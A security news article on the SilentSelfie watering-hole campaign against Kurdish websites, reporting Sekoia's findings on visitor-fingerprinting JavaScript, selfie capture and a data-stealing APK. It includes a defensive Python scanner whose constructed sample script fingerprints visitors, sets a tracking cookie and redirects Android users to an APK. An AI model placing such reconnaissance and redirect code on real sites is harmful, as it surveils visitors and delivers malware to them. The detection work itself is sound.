As many as 25 websites linked to the Kurdish minority have been compromised in a watering hole attack that has been active for over a year and a half, targeting sensitive user information.
French cybersecurity firm Sekoia disclosed details of the campaign, dubbed SilentSelfie, noting that the intrusion has been ongoing since at least December 2022. The firm described the attack as a long-running effort, aimed at gathering information from site visitors through multiple variants of an information-stealing framework.
"The simplest of these frameworks only collected the user's location," said security researchers Felix Aimé and Maxime A. "More complex versions, however, used the selfie camera to record images and encouraged selected users to install a malicious APK—a type of Android application."
The targeted websites include Kurdish press outlets, media linked to the Rojava administration, Kurdish armed forces, and revolutionary far-left political groups based in Türkiye and Kurdish regions. Sekoia informed The Hacker News that the method used to compromise these websites remains uncertain.
A New Threat Cluster?
The attack has not been attributed to any known group or threat actor, suggesting the potential emergence of a new cluster specifically targeting the Kurdish community. Historically, groups like StrongPity and BladeHawk have carried out attacks against Kurdish entities, but this new campaign adds another layer of complexity to the cybersecurity landscape.
Earlier in 2024, Dutch security firm Hunt & Hackett revealed that a Türkiye-nexus threat actor called Sea Turtle had also singled out Kurdish websites in the Netherlands, further amplifying concerns about targeted cyberattacks against the Kurdish community.
The Watering Hole Technique
This particular watering hole attack involves deploying malicious JavaScript on compromised websites. The script collects a wide range of data from site visitors, such as their location, device information (number of CPUs, battery status, browser language), and public IP addresses.
One variant of the reconnaissance script, discovered on Kurdish websites like rojnews[.]news, hawarnews[.]com, and targetplatform[.]net, redirects users to rogue Android APK files. Some variants also use cookies, such as "sessionIdVal," to track users.
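The combination of signals described above (CPU count, battery state, browser language, geolocation, the sessionIdVal cookie and an APK redirect) is what a site operator would look for when auditing their own pages. The scanner below is an added example written for this article, not Sekoia's code or the actual SilentSelfie script; the two JavaScript snippets it scans are constructed for illustration.

```python
"""Heuristic audit of a site's JavaScript for the behaviour cluster Sekoia
attributes to the SilentSelfie reconnaissance script.  Added example for
defenders; not Sekoia's code.  Sample snippets below are constructed."""
import re
from dataclasses import dataclass, field

# Browser APIs matching the data the article says the script collected.
FINGERPRINT_APIS = {
    "cpu_count": r"navigator\.hardwareConcurrency",
    "battery": r"navigator\.getBattery\s*\(",
    "language": r"navigator\.language",
    "geolocation": r"navigator\.geolocation\.(getCurrentPosition|watchPosition)",
    "camera": r"getUserMedia\s*\(",
}
# Hard indicators named in the article: APK redirect and the tracking cookie.
APK_REDIRECT = re.compile(
    r"(location\.(href|assign|replace)|window\.open)\s*[=(]\s*['\"][^'\"]*\.apk", re.I)
TRACKING_COOKIE = re.compile(r"sessionIdVal", re.I)

@dataclass
class Finding:
    fingerprint_hits: list = field(default_factory=list)
    apk_redirect: bool = False
    tracking_cookie: bool = False

    @property
    def suspicious(self) -> bool:
        # A lone navigator.language is normal for i18n; three or more
        # fingerprinting APIs together, or any hard indicator, merits review.
        return len(self.fingerprint_hits) >= 3 or self.apk_redirect or self.tracking_cookie

def scan_js(source: str) -> Finding:
    """Return which indicators appear in one JavaScript source text."""
    f = Finding()
    for name, pattern in FINGERPRINT_APIS.items():
        if re.search(pattern, source):
            f.fingerprint_hits.append(name)
    f.apk_redirect = bool(APK_REDIRECT.search(source))
    f.tracking_cookie = bool(TRACKING_COOKIE.search(source))
    return f

# Constructed samples: a benign language helper and a snippet with the traits.
BENIGN_JS = "const lang = navigator.language || 'en';\ndocument.documentElement.lang = lang.slice(0, 2);\n"
SUSPECT_JS = """var d = {c: navigator.hardwareConcurrency, l: navigator.language};
navigator.getBattery().then(function(b){ d.b = b.level; });
navigator.geolocation.getCurrentPosition(function(p){ d.g = p.coords; });
document.cookie = 'sessionIdVal=' + d.c;
if (/Android/.test(navigator.userAgent)) { window.location.href = 'https://example.invalid/update.apk'; }
"""

if __name__ == "__main__":
    for label, js in (("benign", BENIGN_JS), ("suspect", SUSPECT_JS)):
        r = scan_js(js)
        print(label, "suspicious" if r.suspicious else "clean", r)
```

Run it against the JavaScript actually served by each page (including third-party includes) rather than the files in the repository, since a watering hole injection lives in what visitors receive.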
According to Sekoia's analysis, the malicious Android APK loads the targeted website in a WebView while quietly collecting system data, contact lists, location information, and files on external storage, to the extent the app's permissions allow.
"The code doesn’t persistently stay on the device," noted the researchers, "but it is activated every time the user opens the RojNews application."
Once the app is opened, its LocationHelper service sends the user's location to a malicious server within 10 seconds via HTTP POST requests. The app then waits for further instructions from that server, leaving the compromised device exposed to follow-on commands.
Connections to Recent Events
While it’s unclear who is behind SilentSelfie, Sekoia speculates that it could be connected to the Kurdistan Regional Government of Iraq. This hypothesis is based on the arrest of RojNews journalist Silêman Ehmed by KDP forces in October 2023. Ehmed was sentenced to three years in prison in July 2024.
"Despite the low sophistication of the attack, the scale and duration of the campaign make it noteworthy," the researchers said. "It’s possible that an emerging, less-experienced threat actor is behind these incidents, and they are likely still developing their capabilities."
This SilentSelfie watering hole attack, although not highly sophisticated, has affected a significant number of Kurdish websites and continues to threaten users with information theft and potential malware infections. As the threat landscape evolves, protecting these vulnerable online communities becomes ever more crucial.